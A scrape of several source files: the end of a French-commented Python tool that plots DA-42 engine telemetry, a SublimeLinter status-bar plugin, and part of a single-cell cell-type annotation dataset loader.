ecuactp=[]\r\n drailp=[]\r\n dpropp=[]\r\n dmapp=[]\r\n \r\n\r\n for i in range(n-1):#debut,fin):\r\n s=fic.readline()\r\n s=s.split(\",\")\r\n\r\n tempsp.append(i)\r\n wgp.append(round(float(s[iiwg]),2)) \r\n disloadp.append(round(float(s[iidisload]),1) ) \r\n proprpmp.append(round(float(s[iiproprpm]),2))\r\n propdcp.append(round(float(s[iipropdc]),2))\r\n prspdp.append(int(float(s[iiprspd])))\r\n maptarp.append(int(float(s[iimaptar])))\r\n praildcp.append(int(float(s[iipraildc])))\r\n pratarp.append(int(float(s[iipratar])))\r\n prailp.append(round(float(s[iiprail]),2))\r\n mapp.append(int(float(s[iimap])))\r\n enginep.append(int(float(s[iiengine])))\r\n vbattp.append(round(float(s[iivbatt]),1))\r\n tairp.append(round(float(s[iitair]),2))\r\n th2op.append(int(float(s[iith2o])))\r\n toilp.append(int(float(s[iitoil])))\r\n poilp.append(round(float(s[iipoil]),1))\r\n tgearp.append(int(float(s[iitgear])))\r\n pbarop.append(int(float(s[iipbaro])))\r\n tecup.append(int(float(s[iitecu])))\r\n fchp.append(round(float(s[iifch]),2))\r\n loadp.append(round(float(s[iiload]),1))\r\n altip.append(int(float(-(np.exp((np.log(abs(pbarop[-1]))-np.log(1013.25))/5.255)-1)*(288.15/0.0065)*3.5)))\r\n ecuactp.append(190*float(s[iiecuact]))\r\n drailp.append(pratarp[-1]-prailp[-1])\r\n dpropp.append(prspdp[-1]-proprpmp[-1])\r\n dmapp.append(maptarp[-1]-mapp[-1])\r\n # if (abs(alti[-1]-alti[-2])>1000 and i>debut+5): #pour éviter les valeurs incohérentes\r\n # alti[-1]=alti[-2] #ne fonctionne pas, on s'en passera pour le moment\r\n if prspdp[-1]==-1: #permet de retirer les lignes où tout est égal à -1, les courbes sont vachement mieux et problème de l'alti réglée?\r\n for i in [tempsp,wgp,disloadp,proprpmp,propdcp,prspdp,maptarp,praildcp,pratarp,prailp,mapp,enginep,vbattp,tairp,th2op,toilp,poilp,tgearp,pbarop,tecup,fchp,loadp,altip,ecuactp,drailp,dpropp,dmapp]:\r\n del i[-1]\r\n \r\n fic.close()\r\n \r\n niveau=min(altip) \r\n for i in range(len(altip)): #pour affiner la valeur de l'altitude, on considère 0m-> plus basse pression\r\n altip[i]=altip[i]-niveau\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n k=(wg3,disload3,proprpm3,propdc3,prspd3,maptar3,praildc3,pratar3,prail3,map3,engine3,vbatt3,tair3,th2o3,toil3,poil3,tgear3,pbaro3,tecu3,fch3,load3,alti3)\r\n fig=plt.figure(figsize=(40,20))\r\n # ax = fig.add_subplot(111, axisbg='#FFFFFF') #si on veut rajouter des barres horizontales et verticales autour du curseur, +voir ligne curseur\r\n tableau=[]\r\n tableau2=[]\r\n tableau.append(temps)\r\n tableau2.append(tempsp) #tableau des valeurs qu'on va afficher après\r\n courbes=['Temps']\r\n courbes2=['Temps']\r\n \r\n plt.subplot(211)\r\n if k[0]:\r\n plt.plot(temps,wg,label='Waste Gate')\r\n tableau.append(wg)\r\n courbes.append('Waste Gate') #titre à afficher pour le tableau de valeurs\r\n if k[5]:\r\n plt.plot(temps,maptar,label='Map Tar')\r\n tableau.append(maptar)\r\n courbes.append('Map Tar')\r\n if k[9]:\r\n plt.plot(temps,map,label='MAP')\r\n tableau.append(map)\r\n courbes.append('MAP')\r\n if int(maintenance)==0:\r\n tableau.append(dmap)\r\n courbes.append('Écart MAP')\r\n if k[1]:\r\n plt.plot(temps,disload,label='DisLoad')\r\n tableau.append(disload)\r\n courbes.append('DisLoad')\r\n if k[10]:\r\n plt.plot(temps,engine,label='Engine Revs. RPM-A47')\r\n tableau.append(engine)\r\n courbes.append('Engine Revs. RPM-A47')\r\n if k[20]:\r\n plt.plot(temps,load,label='Load-A87')\r\n tableau.append(load)\r\n courbes.append('Load-A87')\r\n if k[4]:\r\n plt.plot(temps,prspd,label='Prop Speed')\r\n tableau.append(prspd)\r\n courbes.append('Prop Speed')\r\n if k[2]:\r\n plt.plot(temps,proprpm,label='Prop RPM')\r\n tableau.append(proprpm)\r\n courbes.append('Prop RPM')\r\n if int(maintenance)==0:\r\n tableau.append(dprop)\r\n courbes.append('Écart PROP')\r\n if k[3]:\r\n plt.plot(temps,propdc,label='Prop DC')\r\n tableau.append(propdc)\r\n courbes.append('Prop DC')\r\n if k[6]:\r\n plt.plot(temps,praildc,label='Prail DC')\r\n tableau.append(praildc)\r\n courbes.append('Prail DC')\r\n if k[7]:\r\n plt.plot(temps,pratar,label='PraTar')\r\n tableau.append(pratar)\r\n courbes.append('PraTar')\r\n if k[8]:\r\n plt.plot(temps,prail,label='Prail')\r\n tableau.append(prail)\r\n courbes.append('Prail')\r\n if int(maintenance)==0:\r\n tableau.append(drail)\r\n courbes.append('Écart Rail')\r\n if k[19]:\r\n plt.plot(temps,fch,label='FCh-A246')\r\n tableau.append(fch)\r\n courbes.append('FCh-A246')\r\n if k[12]:\r\n plt.plot(temps,tair,label='TAir-A93')\r\n tableau.append(tair)\r\n courbes.append('TAir-A93')\r\n if k[13]:\r\n plt.plot(temps,th2o,label='TH2O-A92')\r\n tableau.append(th2o)\r\n courbes.append('TH2O-A92')\r\n if k[14]:\r\n plt.plot(temps,toil,label='TOil-A94')\r\n tableau.append(toil)\r\n courbes.append('TOil-A94')\r\n if k[16]:\r\n plt.plot(temps,tgear,label='TGear-A267')\r\n tableau.append(tgear)\r\n courbes.append('TGear-A267')\r\n if k[18]:\r\n plt.plot(temps,tecu,label='TECU-A96')\r\n tableau.append(tecu)\r\n courbes.append('TECU-A96')\r\n if k[15]:\r\n plt.plot(temps,poil,label='POil-A97')\r\n tableau.append(poil)\r\n courbes.append('POil-A97')\r\n if k[17]:\r\n plt.plot(temps,pbaro,label='PBaro-A99')\r\n tableau.append(pbaro)\r\n courbes.append('PBaro-A99')\r\n if k[21]:\r\n plt.plot(temps,alti,label=\"Allure de l'altitude\")\r\n tableau.append(alti)\r\n courbes.append(\"Altitude\")\r\n if k[11]:\r\n plt.plot(temps,vbatt,label='VBatt-A91')\r\n tableau.append(vbatt)\r\n courbes.append('VBatt-A91')\r\n plt.plot(temps,ecuact,'#798081',label=t[iecuact]) #hexa du gris, courbe pour voir si l'ECU selectionnée est active\r\n plt.legend()\r\n if ecu0=='0':\r\n titre+=' ECU A'\r\n else:\r\n titre+=' ECU B'\r\n plt.title(titre) #immat du moteur+nombre d'heures de vol\r\n \r\n \r\n plt.subplot(212)\r\n \r\n \r\n if k[0]:\r\n plt.plot(tempsp,wgp,label='Waste Gate')\r\n tableau2.append(wgp)\r\n courbes2.append('Waste Gate') #titre à afficher pour le tableau2 de valeurs\r\n if k[5]:\r\n plt.plot(tempsp,maptarp,label='Map Tar')\r\n tableau2.append(maptarp)\r\n courbes2.append('Map Tar')\r\n if k[9]:\r\n plt.plot(tempsp,mapp,label='MAP')\r\n tableau2.append(mapp)\r\n courbes2.append('MAP')\r\n if int(maintenance)==0:\r\n tableau2.append(dmapp)\r\n courbes2.append('Écart MAP')\r\n if k[1]:\r\n plt.plot(tempsp,disloadp,label='DisLoad')\r\n tableau2.append(disloadp)\r\n courbes2.append('DisLoad')\r\n if k[10]:\r\n plt.plot(tempsp,enginep,label='Engine Revs. RPM-A47')\r\n tableau2.append(enginep)\r\n courbes2.append('Engine Revs. RPM-A47')\r\n if k[20]:\r\n plt.plot(tempsp,loadp,label='Load-A87')\r\n tableau2.append(loadp)\r\n courbes2.append('Load-A87')\r\n if k[4]:\r\n plt.plot(tempsp,prspdp,label='Prop Speed')\r\n tableau2.append(prspdp)\r\n courbes2.append('Prop Speed')\r\n if k[2]:\r\n plt.plot(tempsp,proprpmp,label='Prop RPM')\r\n tableau2.append(proprpmp)\r\n courbes2.append('Prop RPM')\r\n if int(maintenance)==0:\r\n tableau2.append(dpropp)\r\n courbes2.append('Écart PROP')\r\n if k[3]:\r\n plt.plot(tempsp,propdcp,label='Prop DC')\r\n tableau2.append(propdcp)\r\n courbes2.append('Prop DC')\r\n if k[6]:\r\n plt.plot(tempsp,praildcp,label='Prail DC')\r\n tableau2.append(praildcp)\r\n courbes2.append('Prail DC')\r\n if k[7]:\r\n plt.plot(tempsp,pratarp,label='PraTar')\r\n tableau2.append(pratarp)\r\n courbes2.append('PraTar')\r\n if k[8]:\r\n plt.plot(tempsp,prailp,label='Prail')\r\n tableau2.append(prailp)\r\n courbes2.append('Prail')\r\n if int(maintenance)==0:\r\n tableau2.append(drailp)\r\n courbes2.append('Écart Rail')\r\n if k[19]:\r\n plt.plot(tempsp,fchp,label='FCh-A246')\r\n tableau2.append(fchp)\r\n courbes2.append('FCh-A246')\r\n if k[12]:\r\n plt.plot(tempsp,tairp,label='TAir-A93')\r\n tableau2.append(tairp)\r\n courbes2.append('TAir-A93')\r\n if k[13]:\r\n plt.plot(tempsp,th2op,label='TH2O-A92')\r\n tableau2.append(th2op)\r\n courbes2.append('TH2O-A92')\r\n if k[14]:\r\n plt.plot(tempsp,toilp,label='TOil-A94')\r\n tableau2.append(toilp)\r\n courbes2.append('TOil-A94')\r\n if k[16]:\r\n plt.plot(tempsp,tgearp,label='TGear-A267')\r\n tableau2.append(tgearp)\r\n courbes2.append('TGear-A267')\r\n if k[18]:\r\n plt.plot(tempsp,tecup,label='TECU-A96')\r\n tableau2.append(tecup)\r\n courbes2.append('TECU-A96')\r\n if k[15]:\r\n plt.plot(tempsp,poilp,label='POil-A97')\r\n tableau2.append(poilp)\r\n courbes2.append('POil-A97')\r\n if k[17]:\r\n plt.plot(tempsp,pbarop,label='PBaro-A99')\r\n tableau2.append(pbarop)\r\n courbes2.append('PBaro-A99')\r\n if k[21]:\r\n plt.plot(tempsp,altip,label=\"Allure de l'altitude\")\r\n tableau2.append(altip)\r\n courbes2.append(\"Altitude\")\r\n if k[11]:\r\n plt.plot(tempsp,vbattp,label='VBatt-A91')\r\n tableau2.append(vbattp)\r\n courbes2.append('VBatt-A91')\r\n plt.plot(tempsp,ecuactp,'#798081',label=t[iiecuact]) #hexa du gris, courbe pour voir si l'ECU selectionnée est active\r\n plt.legend()\r\n if ecu1=='0':\r\n titre2+=' ECU A'\r\n else:\r\n titre2+=' ECU B'\r\n plt.title(titre2) #immat du moteur+nombre d'heures de vol\r\n \r\n \r\n plt.show()\r\n again+=1\r\n l=''\r\n for i in courbes:\r\n c=len(i)\r\n c-=11\r\n c=-c\r\n c=c*' '\r\n l+=i+c\r\n # ppp=l+'\\n'\r\n ppp=''\r\n temp=''\r\n for j in range(len(tableau[0])):\r\n temp=' '\r\n for i in range(len(tableau)):\r\n b=len(str(tableau[i][j]))\r\n b-=11\r\n b=-b\r\n b=b*' '\r\n temp=temp+str(tableau[i][j])+b\r\n # print(str(temp)[1:-1])\r\n temp+='\\n'\r\n ppp+=temp\r\n \r\n l2=''\r\n for i in courbes2:\r\n c2=len(i)\r\n c2-=11\r\n c2=-c2\r\n c2=c2*' '\r\n l2+=i+c2\r\n # ppp=l+'\\n'\r\n ppp2=''\r\n temp2=''\r\n for j in range(len(tableau2[0])):\r\n temp2=' '\r\n for i in range(len(tableau2)):\r\n b2=len(str(tableau2[i][j]))\r\n b2-=11\r\n b2=-b2\r\n b2=b2*' '\r\n temp2=temp2+str(tableau2[i][j])+b2\r\n # print(str(temp)[1:-1])\r\n temp2+='\\n'\r\n ppp2+=temp2\r\n \r\n \r\n \r\n \r\n root = Tk()\r\n root.title('Tableau de valeurs 1')\r\n Frame6 = Frame(root,borderwidth=0)#,relief=GROOVE)\r\n Frame6.pack(side=TOP,padx=10,pady=10)\r\n U=Text(Frame6, height=0, width=13*len(courbes))\r\n U.pack()\r\n U.insert(END,l)\r\n T = Text(root, height=400, width=13*len(courbes))\r\n T.pack()\r\n T.insert(END, ppp)\r\n mainloop()\r\n \r\n root = Tk()\r\n root.title('Tableau de valeurs 2')\r\n Frame6 = Frame(root,borderwidth=0)#,relief=GROOVE)\r\n Frame6.pack(side=TOP,padx=10,pady=10)\r\n U=Text(Frame6, height=0, width=13*len(courbes2))\r\n U.pack()\r\n U.insert(END,l)\r\n T = Text(root, height=400, width=13*len(courbes2))\r\n T.pack()\r\n T.insert(END, ppp2)\r\n mainloop()\r\n # \r\n # print(courbes)\r\n # for i in range (len(tableau)):\r\n # print(tableau[i])\r\n # except BaseException:\r\n # print('Le fichier du moteur 2 semble corrompu, il faut effectuer de nouvelles mesures')\r\n recommencer=0\r\n # recommencer=input(\"Recommencer? 1 si oui :\")\r\n global fenetre2\r\n fenetre2=Tk() #boutons radio (un seul peut être coché à la fois)\r\n fenetre2.title(\"\")\r\n quitt=Button(fenetre2, text=\"Quitter\", command=fenetre2.destroy)\r\n reco=Button(fenetre2, text='Recommencer', command=f)\r\n propos=Button(fenetre2, text='À propos',command=apropos)\r\n # valeurs1=Button(fenetre2, text=\"Afficher le 1er tableau\", command=h(ppp))\r\n # valeurs2=Button(fenetre2, text=\"Afficher le 2ème tableau\", command=h(ppp2))\r\n # valeurs1.pack()\r\n # valeurs2.pack()\r\n reco.pack()\r\n propos.pack()\r\n quitt.pack()\r\n mainloop()\r\n \r\n \r\n \r\n \r\n\r\nlargeur=60\r\n\r\nglobal nbdemoteurs\r\nfenetre=Tk() #boutons radio (un seul peut être coché à la fois)\r\nfenetre.title(\"Choix du nombre de moteurs\")\r\nvar = StringVar()\r\nc1 = Radiobutton(fenetre, text=\"Un moteur\", variable=var, value=0, width=largeur)\r\nc2 = Radiobutton(fenetre, text=\"Deux moteurs\", variable=var, value=1,width=largeur)\r\nOK=Button(fenetre, text='OK', command=fenetre.destroy)\r\nc1.pack()\r\nc2.pack()\r\nOK.pack()\r\nc1.select()\r\nmainloop()\r\nnbdemoteurs=var.get() #-> pour récupérer la valeur associée au bouton \r\n\r\nif str(nbdemoteurs)=='1':\r\n rtlf2()\r\nelse:\r\n rtlf()\r\n\r\n\r\n","repo_name":"LoOTW/Diamant2","sub_path":"RTLF_DA-42.py","file_name":"RTLF_DA-42.py","file_ext":"py","file_size_in_byte":53146,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34958380584","text":"from collections import defaultdict\nfrom functools import partial\nimport threading\n\nimport sublime\nimport sublime_plugin\n\nfrom .lint import events, persist, util\n\n\nMYPY = False\nif MYPY:\n from typing import DefaultDict, Dict, Iterator, List, Set\n from mypy_extensions import TypedDict\n\n FileName = str\n LinterName = str\n State_ = TypedDict('State_', {\n 'assigned_linters_per_file': DefaultDict[FileName, Set[LinterName]],\n 'failed_linters_per_file': DefaultDict[FileName, Set[LinterName]],\n 'problems_per_file': DefaultDict[FileName, Dict[LinterName, str]],\n 'running': DefaultDict[FileName, int],\n 'expanded_ok': Set[FileName],\n })\n\n\nSTATUS_ACTIVE_KEY = 'sublime_linter_status_active'\n\nState = {\n 'assigned_linters_per_file': defaultdict(set),\n 'failed_linters_per_file': defaultdict(set),\n 'problems_per_file': defaultdict(dict),\n 'running': defaultdict(int),\n 'expanded_ok': set(),\n} # type: State_\n\n\ndef plugin_unloaded():\n events.off(redraw_file)\n events.off(on_begin_linting)\n events.off(on_finished_linting)\n events.off(on_actual_linters_changed)\n\n for window in sublime.windows():\n for view in window.views():\n view.erase_status(STATUS_ACTIVE_KEY)\n\n\n@events.on(events.LINT_START)\ndef on_begin_linting(filename):\n # type: (FileName) -> None\n State['running'][filename] += 1\n\n\n@events.on(events.LINT_END)\ndef on_finished_linting(filename):\n # type: (FileName) -> None\n if State['running'][filename] <= 1:\n State['running'].pop(filename)\n else:\n State['running'][filename] -= 1\n\n\ndef on_first_activate(view):\n # type: (sublime.View) -> None\n if not util.is_lintable(view):\n return\n\n filename = util.canonical_filename(view)\n set_expanded_ok(filename)\n draw(view, State['problems_per_file'][filename], expanded_ok=True)\n\n\ndef on_assigned_linters_changed(filename):\n # type: (FileName) -> None\n set_expanded_ok(filename)\n redraw_file_(filename, State['problems_per_file'][filename], expanded_ok=True)\n\n\ndef set_expanded_ok(filename):\n # type: (FileName) -> None\n State['expanded_ok'].add(filename)\n\n\ndef enqueue_unset_expanded_ok(view, timeout=3000):\n # type: (sublime.View, int) -> None\n sublime.set_timeout(\n throttled_on_args(_unset_expanded_ok, view.id()),\n timeout\n )\n\n\ndef _unset_expanded_ok(vid):\n # type: (sublime.ViewId) -> None\n view = sublime.View(vid)\n if not view.is_valid():\n return\n\n filename = util.canonical_filename(view)\n # Keep expanded if linters are running to minimize redraws\n if State['running'].get(filename, 0) > 0:\n enqueue_unset_expanded_ok(view)\n return\n\n State['expanded_ok'].discard(filename)\n draw(view, State['problems_per_file'][filename], expanded_ok=False)\n\n\nclass sublime_linter_assigned(sublime_plugin.WindowCommand):\n def run(self, filename, linter_names):\n # type: (FileName, List[LinterName]) -> None\n State['assigned_linters_per_file'][filename] = set(linter_names)\n State['failed_linters_per_file'][filename] = set()\n\n if assigned_linters_changed(filename, linter_names):\n on_assigned_linters_changed(filename)\n\n\nclass sublime_linter_unassigned(sublime_plugin.WindowCommand):\n def run(self, filename, linter_name):\n State['assigned_linters_per_file'][filename].discard(linter_name)\n State['failed_linters_per_file'][filename].discard(linter_name)\n\n\nclass sublime_linter_failed(sublime_plugin.WindowCommand):\n def run(self, filename, linter_name):\n State['failed_linters_per_file'][filename].add(linter_name)\n\n\n@events.on(events.LINT_RESULT)\ndef redraw_file(filename, linter_name, errors, **kwargs):\n # type: (FileName, LinterName, List[persist.LintError], object) -> None\n problems = State['problems_per_file'][filename]\n if linter_name in State['failed_linters_per_file'][filename]:\n problems[linter_name] = '?'\n elif linter_name in State['assigned_linters_per_file'][filename] or errors:\n if linter_name not in State['assigned_linters_per_file'][filename]:\n State['assigned_linters_per_file'][filename].add(linter_name)\n\n counts = count_problems(errors)\n if sum(counts.values()) == 0:\n problems[linter_name] = ''\n else:\n sorted_keys = (\n tuple(sorted(counts.keys() - {'w', 'e'}))\n + ('w', 'e')\n )\n parts = ' '.join(\n \"{}:{}\".format(error_type, counts[error_type])\n for error_type in sorted_keys\n if error_type in counts and counts[error_type] > 0\n )\n problems[linter_name] = '({})'.format(parts)\n else:\n problems.pop(linter_name, None)\n\n remember_actual_linters(filename, set(problems.keys()))\n\n sublime.set_timeout(\n lambda: redraw_file_(\n filename,\n problems,\n # eval on the UI thread!\n expanded_ok=filename in State['expanded_ok']\n )\n )\n\n\n@events.on('actual_linters_changed')\ndef on_actual_linters_changed(filename, linter_names):\n set_expanded_ok(filename)\n\n\ndef count_problems(errors):\n # type: (List[persist.LintError]) -> Dict[str, int]\n counters = defaultdict(int) # type: DefaultDict[str, int]\n for error in errors:\n error_type = error['error_type']\n counters[error_type[0]] += 1\n\n return counters\n\n\ndef redraw_file_(filename, problems, expanded_ok):\n # type: (FileName, Dict[LinterName, str], bool) -> None\n for view in views_into_file(filename):\n draw(view, problems, expanded_ok)\n\n\ndef views_into_file(filename):\n # type: (FileName) -> Iterator[sublime.View]\n return (\n view\n for window in sublime.windows()\n for view in window.views()\n if util.canonical_filename(view) == filename\n )\n\n\ndef draw(view, problems, expanded_ok):\n # type: (sublime.View, Dict[LinterName, str], bool) -> None\n if persist.settings.get('statusbar.show_active_linters'):\n if (\n not expanded_ok\n and problems.keys()\n and all(part == '' for part in problems.values())\n ):\n message = 'ok'\n view.set_status(STATUS_ACTIVE_KEY, message)\n return\n\n message = ' '.join(\n '{}{}'.format(linter_name, summary)\n for linter_name, summary in sorted(problems.items(), key=by_severity)\n )\n view.set_status(STATUS_ACTIVE_KEY, message)\n enqueue_unset_expanded_ok(view)\n else:\n view.erase_status(STATUS_ACTIVE_KEY)\n\n\ndef by_severity(item):\n linter_name, summary = item\n if summary == '':\n return (0, linter_name)\n elif summary[0] == '?':\n return (2, linter_name)\n return (1, linter_name)\n\n\nTHROTTLER_TOKENS = {}\nTHROTTLER_LOCK = threading.Lock()\n\n\ndef throttled_on_args(fn, *args, **kwargs):\n key = (fn,) + args\n action = partial(fn, *args, **kwargs)\n with THROTTLER_LOCK:\n THROTTLER_TOKENS[key] = action\n\n def program():\n with THROTTLER_LOCK:\n # Use `get` bc during hot-reload `THROTTLER_TOKENS` gets emptied\n ok = THROTTLER_TOKENS.get(key) == action\n if ok:\n action()\n\n return program\n\n\nACTIVATED_VIEWS = set()\n\n\nclass OnFirstActivate(sublime_plugin.EventListener):\n def on_activated(self, view):\n # type: (sublime.View) -> None\n vid = view.id()\n if vid in ACTIVATED_VIEWS:\n return\n\n ACTIVATED_VIEWS.add(vid)\n on_first_activate(view)\n\n def on_close(self, view):\n # type: (sublime.View) -> None\n ACTIVATED_VIEWS.discard(view.id())\n\n\nif MYPY:\n from typing import Container, TypeVar\n T = TypeVar('T')\n U = TypeVar('U')\n\n\nASSIGNED_LINTERS = {} # type: Dict[FileName, Container[LinterName]]\n\n\ndef remember_actual_linters(filename, linter_names):\n # type: (FileName, Set[LinterName]) -> None\n previous = persist.actual_linters.get(filename)\n current = persist.actual_linters[filename] = linter_names\n if current != previous:\n events.broadcast('actual_linters_changed', {\n 'filename': filename,\n 'linter_names': linter_names\n })\n\n\ndef assigned_linters_changed(filename, linter_names):\n # type: (FileName, Container[LinterName]) -> bool\n return not distinct_mapping(ASSIGNED_LINTERS, filename, linter_names)\n\n\ndef distinct_mapping(store, key, val):\n # type: (Dict[T, U], T, U) -> bool\n previous = store.get(key)\n current = store[key] = val\n return current == previous\n","repo_name":"SublimeLinter/SublimeLinter","sub_path":"active_linters_view.py","file_name":"active_linters_view.py","file_ext":"py","file_size_in_byte":8623,"program_lang":"python","lang":"en","doc_type":"code","stars":1995,"dataset":"github-code","pt":"53"} +{"seq_id":"17982694321","text":"import collections\nimport os\nimport os.path as osp\nimport pprint\nimport shutil\nimport sys\nfrom glob import glob\n\nimport anndata as ad\nimport h5py\nimport numpy as np\nimport pandas as pd\nimport scanpy as sc\nfrom scipy.sparse import csr_matrix\n\nfrom dance import logger\nfrom dance.config import METADIR\nfrom dance.data import Data\nfrom dance.datasets.base import BaseDataset\nfrom dance.metadata.imputation import IMPUTATION_DATASET_TO_FILE\nfrom dance.registers import register_dataset\nfrom dance.typing import Dict, List, Optional, Set, Tuple\nfrom dance.utils.download import download_file, download_unzip\nfrom dance.utils.io import load_data_url_dict_from_csv\nfrom dance.utils.preprocess import cell_label_to_df\n\n\ndef _load_scdeepsort_metadata():\n path = METADIR / \"scdeepsort.csv\"\n logger.debug(f\"Loading scdeepsort metadata from {path}\")\n scdeepsort_meta_df = pd.read_csv(path).astype(str)\n\n bench_url_dict, available_data = {}, []\n for _, i in scdeepsort_meta_df.iterrows():\n bench_url_dict[i[\"celltype_fname\"]] = i[\"celltype_url\"]\n bench_url_dict[i[\"data_fname\"]] = i[\"data_url\"]\n available_data.append({key: i[key] for key in (\"split\", \"species\", \"tissue\", \"dataset\")})\n\n return bench_url_dict, available_data\n\n\n@register_dataset(\"CellTypeAnnotation\")\nclass CellTypeAnnotationDataset(BaseDataset):\n _DISPLAY_ATTRS = (\"species\", \"tissue\", \"train_dataset\", \"test_dataset\")\n ALL_URL_DICT: Dict[str, str] = {\n \"train_human_cell_atlas\": \"https://www.dropbox.com/s/1itq1pokplbqxhx?dl=1\",\n \"test_human_test_data\": \"https://www.dropbox.com/s/gpxjnnvwyblv3xb?dl=1\",\n \"train_mouse_cell_atlas\": \"https://www.dropbox.com/s/ng8d3eujfah9ppl?dl=1\",\n \"test_mouse_test_data\": \"https://www.dropbox.com/s/pkr28czk5g3al2p?dl=1\",\n } # yapf: disable\n BENCH_URL_DICT, AVAILABLE_DATA = _load_scdeepsort_metadata()\n\n def __init__(self, full_download=False, train_dataset=None, test_dataset=None, species=None, tissue=None,\n train_dir=\"train\", test_dir=\"test\", map_path=\"map\", data_dir=\"./\"):\n super().__init__(data_dir, full_download)\n\n self.data_dir = data_dir\n self.train_dataset = train_dataset\n self.test_dataset = test_dataset\n self.species = species\n self.tissue = tissue\n self.train_dir = train_dir\n self.test_dir = test_dir\n self.map_path = map_path\n\n def download_all(self):\n if self.is_complete():\n return\n\n # Download and overwrite\n for name, url in self.ALL_URL_DICT.items():\n download_unzip(url, self.data_dir)\n\n parts = name.split(\"_\") # [train|test]_{species}_[cell|test]_atlas\n download_path = osp.join(self.data_dir, \"_\".join(parts[1:]))\n move_path = osp.join(self.data_dir, *parts[:2])\n\n os.makedirs(osp.dirname(move_path), exist_ok=True)\n try:\n shutil.rmtree(move_path)\n except FileNotFoundError:\n pass\n os.rename(download_path, move_path)\n\n def get_all_filenames(self, filetype: str = \"csv\", feat_suffix: str = \"data\", label_suffix: str = \"celltype\"):\n filenames = []\n for id in self.train_dataset + self.test_dataset:\n filenames.append(f\"{self.species}_{self.tissue}{id}_{feat_suffix}.{filetype}\")\n filenames.append(f\"{self.species}_{self.tissue}{id}_{label_suffix}.{filetype}\")\n return filenames\n\n def download(self, download_map=True):\n if self.is_complete():\n return\n\n filenames = self.get_all_filenames()\n # Download training and testing data\n for name, url in self.BENCH_URL_DICT.items():\n parts = name.split(\"_\") # [train|test]_{species}_{tissue}{id}_[celltype|data].csv\n filename = \"_\".join(parts[1:])\n if filename in filenames:\n filepath = osp.join(self.data_dir, *parts[:2], filename)\n download_file(url, filepath)\n\n if download_map:\n # Download mapping data\n download_unzip(\"https://www.dropbox.com/sh/hw1189sgm0kfrts/AAAapYOblLApqygZ-lGo_70-a?dl=1\",\n osp.join(self.data_dir, \"map\"))\n\n def is_complete_all(self):\n \"\"\"Check if data is complete.\"\"\"\n check = [\n osp.join(self.data_dir, \"train\"),\n osp.join(self.data_dir, \"test\"),\n osp.join(self.data_dir, \"pretrained\")\n ]\n for i in check:\n if not osp.exists(i):\n logger.info(f\"file {i} doesn't exist\")\n return False\n return True\n\n def is_complete(self):\n \"\"\"Check if benchmarking data is complete.\"\"\"\n for name in self.BENCH_URL_DICT:\n if any(i not in name for i in (self.species, self.tissue)):\n continue\n filename = name[name.find(self.species):]\n file_i = osp.join(self.data_dir, *(name.split(\"_\"))[:2], filename)\n if not osp.exists(file_i):\n logger.info(file_i)\n logger.info(f\"file {filename} doesn't exist\")\n return False\n # check maps\n map_check = [\n osp.join(self.data_dir, \"map\", \"mouse\", \"map.xlsx\"),\n osp.join(self.data_dir, \"map\", \"human\", \"map.xlsx\"),\n osp.join(self.data_dir, \"map\", \"celltype2subtype.xlsx\")\n ]\n for file in map_check:\n if not osp.exists(file):\n logger.info(f\"file {name} doesn't exist\")\n return False\n return True\n\n def _load_raw_data(self, ct_col: str = \"Cell_type\") -> Tuple[ad.AnnData, List[Set[str]], List[str], int]:\n species = self.species\n tissue = self.tissue\n train_dataset_ids = self.train_dataset\n test_dataset_ids = self.test_dataset\n data_dir = self.data_dir\n train_dir = osp.join(data_dir, self.train_dir)\n test_dir = osp.join(data_dir, self.test_dir)\n map_path = osp.join(data_dir, self.map_path, self.species)\n\n # Load raw data\n train_feat_paths, train_label_paths = self._get_data_paths(train_dir, species, tissue, train_dataset_ids)\n test_feat_paths, test_label_paths = self._get_data_paths(test_dir, species, tissue, test_dataset_ids)\n train_feat, test_feat = (self._load_dfs(paths, transpose=True) for paths in (train_feat_paths, test_feat_paths))\n train_label, test_label = (self._load_dfs(paths) for paths in (train_label_paths, test_label_paths))\n\n # Combine features (only use features that are present in the training data)\n train_size = train_feat.shape[0]\n feat_df = pd.concat(train_feat.align(test_feat, axis=1, join=\"left\", fill_value=0)).fillna(0)\n adata = ad.AnnData(feat_df, dtype=np.float32)\n\n # Convert cell type labels and map test cell type names to train\n cell_types = set(train_label[ct_col].unique())\n idx_to_label = sorted(cell_types)\n cell_type_mappings: Dict[str, Set[str]] = self.get_map_dict(map_path, tissue)\n train_labels, test_labels = train_label[ct_col].tolist(), []\n for i in test_label[ct_col]:\n test_labels.append(i if i in cell_types else cell_type_mappings.get(i))\n labels: List[Set[str]] = train_labels + test_labels\n\n logger.debug(\"Mapped test cell-types:\")\n for i, j, k in zip(test_label.index, test_label[ct_col], test_labels):\n logger.debug(f\"{i}:{j}\\t-> {k}\")\n\n logger.info(f\"Loaded expression data: {adata}\")\n logger.info(f\"Number of training samples: {train_feat.shape[0]:,}\")\n logger.info(f\"Number of testing samples: {test_feat.shape[0]:,}\")\n logger.info(f\"Cell-types (n={len(idx_to_label)}):\\n{pprint.pformat(idx_to_label)}\")\n\n return adata, labels, idx_to_label, train_size\n\n def _raw_to_dance(self, raw_data):\n adata, cell_labels, idx_to_label, train_size = raw_data\n adata.obsm[\"cell_type\"] = cell_label_to_df(cell_labels, idx_to_label, index=adata.obs.index)\n data = Data(adata, train_size=train_size)\n return data\n\n @staticmethod\n def _get_data_paths(data_dir: str, species: str, tissue: str, dataset_ids: List[str], *, filetype: str = \"csv\",\n feat_suffix: str = \"data\", label_suffix: str = \"celltype\") -> Tuple[List[str], List[str]]:\n feat_paths, label_paths = [], []\n for path_list, suffix in zip((feat_paths, label_paths), (feat_suffix, label_suffix)):\n for i in dataset_ids:\n path_list.append(osp.join(data_dir, species, f\"{species}_{tissue}{i}_{suffix}.{filetype}\"))\n return feat_paths, label_paths\n\n @staticmethod\n def _load_dfs(paths: List[str], *, index_col: Optional[int] = 0, transpose: bool = False, **kwargs):\n dfs = []\n for path in paths:\n logger.info(f\"Loading data from {path}\")\n # TODO: load feat as csr\n df = pd.read_csv(path, index_col=index_col, **kwargs)\n # Labels: cell x cell-type; Data: feature x cell (need to transpose)\n df = df.T if transpose else df\n # Add dataset info to index\n dataset_name = \"_\".join(osp.basename(path).split(\"_\")[:-1])\n df.index = dataset_name + \"_\" + df.index.astype(str)\n dfs.append(df)\n combined_df = pd.concat(dfs)\n return combined_df\n\n @staticmethod\n def 